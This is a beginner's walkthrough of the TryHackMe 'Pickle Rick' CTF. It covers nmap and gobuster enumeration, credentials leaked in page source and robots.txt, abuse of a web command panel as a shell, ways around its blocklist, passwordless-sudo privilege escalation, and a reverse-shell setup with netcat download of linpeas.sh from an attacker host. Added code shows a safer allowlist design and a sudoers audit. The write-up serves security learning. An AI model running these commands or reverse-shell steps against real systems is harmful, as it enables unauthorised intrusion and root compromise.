Pickle Rick CTF Writeup (Full and Detailed) — TryHackMe

Matheus Heidemann
Nov 28, 2022


This is a full walkthrough of the Pickle Rick CTF at TryHackMe. The objective of this writeup is to explain, to my future self and to anyone else, how I solved this CTF and which tools I used.

General information

  • Difficulty level: easy
  • Platform: TryHackMe
  • Vulnerabilities explored in this writeup: sensitive data exposure, command injection, privilege escalation through the sudoers file.

Introduction

The Pickle Rick CTF is a TryHackMe vulnerable VM classified as “easy”. It’s based on the TV series “Rick and Morty”, where in one episode Rick turns himself into a pickle. In this CTF, Rick turned himself into a pickle again, but this time he wasn’t able to go back to his human form, so we play as Morty, who needs to access Rick’s computer to gather information about the 3 ingredients (flags) needed to turn Rick back into a human.

Let’s go!

Enumeration with NMAP

First and most obvious, let’s enumerate the IP we received from TryHackMe using NMAP. The target VM’s IP address, in my case, was 10.10.218.16.

sudo nmap <TARGET_IP> -A -T 4 -v -oN scan_results

NMAP scan command
  • -A (Aggressive Scan): enables “aggressive scan mode”, which turns on OS detection (-O), version detection (-sV), default script scanning (-sC) and traceroute (--traceroute);
  • -T 4 (“Aggressive” Timing Template): NMAP has 6 timing templates (0–6, or paranoid to insane), which change NMAP’s timing so we can try to avoid firewalls or IDS/IPS systems. Higher numbers are faster but send more traffic, so they are more likely to be detected by those technologies; considering this is a simple CTF, the presence of firewalls or IDS/IPS systems is unlikely;
  • -v (Verbose): as the name suggests, it enables verbose mode, so we can see the NMAP results in real time;
  • -oN scan_results (Output Normal): this argument writes the scan results to a file called “scan_results”.

After the NMAP enumeration, our scan gives us this important information:

NMAP scan results
  • Port 22 is running an SSH service with OpenSSH 7.2p2, so we might need to exploit SSH to gain access to the machine;
  • Port 80 is running an HTTP service with Apache 2.4.18, so we might need to exploit a web application to gather information, get a web shell, or upload a file to get a reverse shell;

Exploring the website

If we navigate to “http://<TARGET_IP>:80” we are greeted with a webpage that doesn’t tell us much about how to proceed to get access to the machine. The only info we get is that Rick doesn’t remember the password.

The default webpage (or the index.html file)

As this page doesn’t have any buttons or anything that could take us to another page, let’s see if we can find any interesting information in the page source code. We can see the page source in Firefox by hitting “CTRL + U”, by hitting “CTRL + ALT + I” to see the source in the Inspector, or simply by right-clicking anywhere on the page and choosing “View page source”.

Username commented in the index.html source code

There you go, we found a Sensitive Data Exposure vulnerability in the source code of this webpage: a comment gives us the username “R1ckRul3s”.

We can try navigating to the “/assets” path as well, as we found on the source code:

“/assets” path in the index.html source code

But unfortunately, if we navigate to “http://<TARGET_IP>:80/assets” we aren’t going to find any useful information, just a bunch of images, jQuery files, etc.

“/assets” path files

Now we have a username, but still… even if we had a password, how should we login if we can’t find this functionality anywhere?

Let me tell you something in advance: no, we can’t use this username in the FTP service for a brute-force attack. Actually, we can’t even connect to the FTP service, as we get this message:

FTP connection refused error

So, if we can’t use this username in FTP, and there is nowhere on the webpage to use it either, how should we proceed? Well, maybe we need to do more enumeration on the web application! So, let’s try to find other directories and files on the web application that might be interesting to us.

Brute-forcing directories and files from the website

To find directories or files in a web application, we can use GoBuster to brute-force URIs. We could use another tool like “Nikto”, but we are going to focus on GoBuster, as this tool is able to get all the work done.

So, we are going to execute the following command on our shell:

gobuster dir -u <TARGET_URL> -x php,html,css,js,txt,pdf -w <WORDLIST>

GoBuster brute-force command
  • dir: this option tells GoBuster we will brute-force directories or files;
  • -u (URL or Domain): the URL or domain of the target we want to brute-force;
  • -x (File eXtensions): the file extensions we are looking for with the provided wordlist. We are looking for the most common ones, but we could give GoBuster many more extensions to find hidden files;
  • -w (Wordlist): as the name suggests, the wordlist we will use for the brute-force. In this situation, we are using “directory-list-2.3-medium.txt”.

This process will take a massive amount of time, as there are 220561 words to be brute-forced. So we will stop our brute-force early, because we have already gathered enough information to proceed to the next step.

GoBuster results

We can see we found 3 new files: login.php, portal.php and robots.txt. So, let’s navigate to them and see if we can find any interesting information.

In the “login.php” (200 HTTP Status Code) webpage we are greeted with this login form. We already have a username, but no password. So, let’s see if the other files we found give us any insight about a password.

portal.php webpage

From the “portal.php” webpage we get redirected to the same “login.php” webpage (302 HTTP Status Code), so we can assume we will only have access to “portal.php” once we have successfully authenticated ourselves to the web application.

Finally, at the “robots.txt”, we get a very curious string saying “Wubbalubbadubdub”. This string is actually a very common quote from Rick. Maybe this is his password? Worth trying!

robots.txt

Going back to the “login.php” webpage and using “R1ckRul3s” as the username and “Wubbalubbadubdub” as the password, we log in successfully and gain access to the “portal.php” webpage!

“login.php” login form with the username and the password
“portal.php” webpage

Using the website’s Command Panel

Now on this “portal.php” webpage we can see something that is going to be extremely useful to us: a command panel. If you do a little bit of testing, you will see that this command panel accepts Linux commands, so it’s just like a web shell!

By the way, if we try to access any other tab, we always end up on the “denied.php” webpage, which looks like this:

“denied.php” webpage

So, let’s input some Linux commands into that Command Panel to see what we can do.

Getting the first ingredient/flag

First, by inputting the command “ls -a” we can see all the files in the folder we’re currently in:

There’s a file clearly standing out there called “Sup3rS3cretPickl3Ingred.txt”, so let’s read what’s inside it.

“cat Sup3rS3cretPickl3Ingred.txt” output

Well well, we just can’t use the “cat” command! So how are we going to read what’s inside this file? Actually there are plenty of ways of doing it; here are a few commands that can replace “cat” in this situation:

  • tac Sup3rS3cretPickl3Ingred.txt
  • less Sup3rS3cretPickl3Ingred.txt
  • strings Sup3rS3cretPickl3Ingred.txt
  • grep . Sup3rS3cretPickl3Ingred.txt
  • cp Sup3rS3cretPickl3Ingred.txt /dev/stdout
  • while read line; do echo $line; done < Sup3rS3cretPickl3Ingred.txt

So, by using one of the commands above we can find the 1st ingredient that Rick needs:

1st flag

There we go! First flag done!

It’s worth mentioning that not only is the “cat” command disabled, but “head”, “more”, “tail”, “nano”, “vim” and “vi” are disabled as well. How do I know this? Use one of the commands above, but this time specify the file “portal.php”, then hit “CTRL + U” to see the source code:

“portal.php” file content

Yes, it’s a little messy, but if we organize it a bit we can clearly read all the PHP logic inside the “portal.php” file (which is where we are inputting our commands).
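Why that filter is so easy to get around, and what a safer panel looks like, as an added Python example (this is not the CTF’s portal.php, whose PHP is not reproduced here): the first function models the blocklist the writeup describes, the second replaces the shell with a fixed set of named actions. BASE_DIR and the action names are assumptions.

```python
from pathlib import Path
from typing import List, Optional

# Commands the writeup reports portal.php refusing.
BLOCKED = {"cat", "head", "more", "tail", "nano", "vim", "vi"}


def blocklist_allows(cmd: str) -> bool:
    """Model of the panel's filter as described in the writeup: refuse the
    command only if its first word is on the blocklist, otherwise hand the
    raw string to a shell. Every alternative reader listed above (tac, less,
    strings, grep, cp, while/read) passes, and so does any other command the
    shell understands; a blocklist can never enumerate them all."""
    words = cmd.split()
    return bool(words) and words[0] not in BLOCKED


# Hardened design: no shell at all. The panel offers a few named actions,
# each mapped to a fixed argv list; the only user-controlled value is a
# bare file name confined to one directory.
BASE_DIR = Path("/var/www/html")  # assumption: the panel's working directory


def allowlist_argv(action: str, name: str = "") -> Optional[List[str]]:
    """Return the argv to run with subprocess.run(argv) (no shell), or None
    when the request is refused."""
    if action == "list":
        return ["ls", "-la", str(BASE_DIR)]
    if action == "read":
        # reject empty names, path separators, dot-files and ".." up front
        if not name or "/" in name or name.startswith("."):
            return None
        target = (BASE_DIR / name).resolve()
        if target.parent != BASE_DIR.resolve():  # also catches symlink escapes
            return None
        return ["cat", str(target)]
    return None  # anything else, including a raw shell string, is refused
```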

Getting the second ingredient/flag

Now, if we go back, we can see that there is another .txt file standing out in the “ls -a” output. If we read that .txt file just like we did with “Sup3rS3cretPickl3Ingred.txt” or “portal.php”, we get the following output:

“clue.txt” output

Pretty straightforward. I usually start by checking the “/home/” directory, so let’s see if we can find more clues or important information there.

“/home/” contents

As we can see, by inputting the “ls -al” command in the “/home/” directory, we find a home directory for “rick”! By listing the contents of this directory, we find another file with the very flashy name “second ingredients”:

“/home/rick/” contents

And so, by reading the contents of this file with “tac /home/rick/second\ ingredients” we get the 2nd ingredient Rick needs!

2nd flag

Be aware of the backslash after the word “second”: it escapes the space in the file name. If we don’t use the backslash, the command won’t work, unless we put the full file path in quotes (tac “/home/rick/second ingredients”). Which way you do it is up to you.

Getting the third ingredient/flag

Now there’s only one ingredient/flag remaining, but we don’t have any clues where it is, so we can assume it’s the “root flag”, which will demand us to escalate privileges to become the root user.

If we type the command “whoami” in the Command Panel, we will see that we are “www-data” at the moment, and this user can’t access the “/root/” directory.

“whoami” output

To get root, I am going to explain two different approaches we can take: the simple one and the sweaty one.

Escalating privileges: simple way

The simple method is… well… simple. If we type “sudo -l” in the Command Panel we get output from the “/etc/sudoers” file, and there is an entry specifically for our “www-data” user, which says that “www-data” can execute any command on the system as the root user without providing a password.

Well, if we can execute any command as root without providing the root password, why don’t we just execute whatever we want with the “sudo” prefix every time? This is what we’re going to do!

So, by listing all the contents of the “/root/” directory with the “sudo” prefix, we get a list of files, one of which has the very peculiar name “3rd.txt”.

“sudo ls -al /root/” output

There we go! This is the 3rd ingredient/flag, let’s read what’s inside the “3rd.txt” file:

3rd flag

The CTF is already done, but let’s see how we would try to find privilege escalation vulnerabilities.
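The finding behind the simple way above, and behind the linpeas snippet in the sweaty way below, is the same sudoers entry. As an added example (not from the writeup and not linpeas code), this Python audit parses sudoers-style user specifications and flags exactly that class of entry; the sample file and the SERVICE_ACCOUNTS set are constructed assumptions, not the CTF box’s real sudoers.

```python
import re
from typing import List, Tuple

# Constructed /etc/sudoers sample. The www-data line is the kind of entry the
# writeup describes; the CTF box's actual file is not shown on the page.
SAMPLE_SUDOERS = """\
# User privilege specification
root      ALL=(ALL:ALL) ALL
%sudo     ALL=(ALL:ALL) ALL
www-data  ALL=(ALL) NOPASSWD: ALL
morty     ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
"""

# Accounts that serve network traffic and should never hold sudo rights
# (assumption: extend this set for your own environment).
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}

# user  host=(runas) [TAG:] command list
USER_SPEC = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$"
)


def audit_sudoers(text: str) -> List[Tuple[str, str]]:
    """Return (account, reason) pairs for risky user specifications.
    Skips comments and Defaults lines, and strips tags such as NOPASSWD:
    or SETENV: to see the real command list."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = USER_SPEC.match(line)
        if not m:
            continue
        who, cmds = m["who"], m["cmds"]
        nopasswd = "NOPASSWD:" in cmds
        cmd_list = re.sub(r"\b[A-Z]+:\s*", "", cmds).strip()
        if who in SERVICE_ACCOUNTS:
            findings.append((who, "service account has a sudo entry"))
        if nopasswd and cmd_list == "ALL":
            findings.append((who, "passwordless root for any command (NOPASSWD: ALL)"))
    return findings
```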

Escalating privileges: sweaty way

The sweaty method is more complex, but it is still a very simple and easy way to escalate our privileges. We are just going to get a reverse shell working with a Python script, and then run a shell script called “linpeas.sh” to enumerate possible privilege escalation vulnerabilities on the target machine.

So, let’s start!

First we need a reverse shell, so let’s see if the target machine has Python or Python3 installed:

“which python3” output

As we can see, the target machine has Python3 installed, so we can try using a Python reverse shell script.

We can find a Python reverse shell in the well-known “Reverse Shell Cheat Sheet from pentestmonkey”; if we scroll a little we see this script:

Python reverse shell script

So, just copy the script and change the IP “10.0.0.1” to your TryHackMe VPN tun0 interface IP address.

Now, we are going to use Netcat on our machine and listen on the port “1234”:

nc -lvnp 1234

“nc -lvnp 1234” output

Now we go back to the “portal.php” page and input the Python reverse shell script there.

Python reverse shell script on the Command Panel

After executing the command, we will have a working reverse shell!

Reverse shell working

Before uploading our file to the server and enumerating privilege escalation possibilities, let’s make our shell a little better by running the following Python code:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Python code to make the shell better

Now that we have a more usable reverse shell, let’s download the “linpeas.sh” script to our machine, and then use Netcat to transfer it from our machine to the target machine.

To do so, first we need to navigate to the folder where our “linpeas.sh” script is, and then type the following command on our machine:

nc -q 0 -lnvp <PORT> < linpeas.sh

Netcat command on our machine

Be aware that ATTACKING_IP is our TryHackMe VPN IP address, nothing else. So, go to the reverse shell and type the following command:

nc <ATTACKING_IP> <PORT> > /tmp/lin/linpeas.sh

Netcat command on target machine

This command will download the “linpeas.sh” we put on listen with Netcat on the chosen port. Now just run “ls -l /tmp” to make sure our “linpeas.sh” file is present there:

“ls -l /tmp” output

As we can see, our “linpeas.sh” file is now on the target machine. To run the script, first make sure you have execute permissions. Looking at the permissions in the “ls -l” output, we clearly don’t have them (-rw-r--r--), so let’s simply type “chmod +x linpeas.sh” (-rwxr-xr-x).

After that, just type “./linpeas.sh” to run the script. We will get a long list telling us a lot about privilege escalation on the system, but what really matters to us is this snippet:

linpeas.sh output snippet

This is where we get the information that the user “www-data” is able to execute all commands with sudo without providing a password, just as we saw in the “simple way” above.

Now we just need to repeat what we did in the “simple way” to get our 3rd and last ingredient/flag, but as we are no longer blocked by the filters in “portal.php”, we can use, for example, the “cat” command here in the reverse shell:

3rd flag

Conclusion

That’s it! The CTF is done!

We successfully helped Rick turn back to human by hacking into his machine and getting all the three necessary ingredients.

This is an easy-level CTF that definitely helps new cybersecurity students learn how CTFs work. I myself am a beginner at cybersecurity and pentesting, and I had to think a bit and try different things to make sure I could get all three flags. That’s why these CTFs help us learn a lot: we need to test and try different things, which sometimes leads nowhere in a particular CTF, but we still end up learning something new that can help us in other CTFs or even in specific future situations.

This was my first post about cybersecurity, as well as my first post on Medium. If you enjoyed it, leave a clap and comment your thoughts or questions about it.

Thanks!
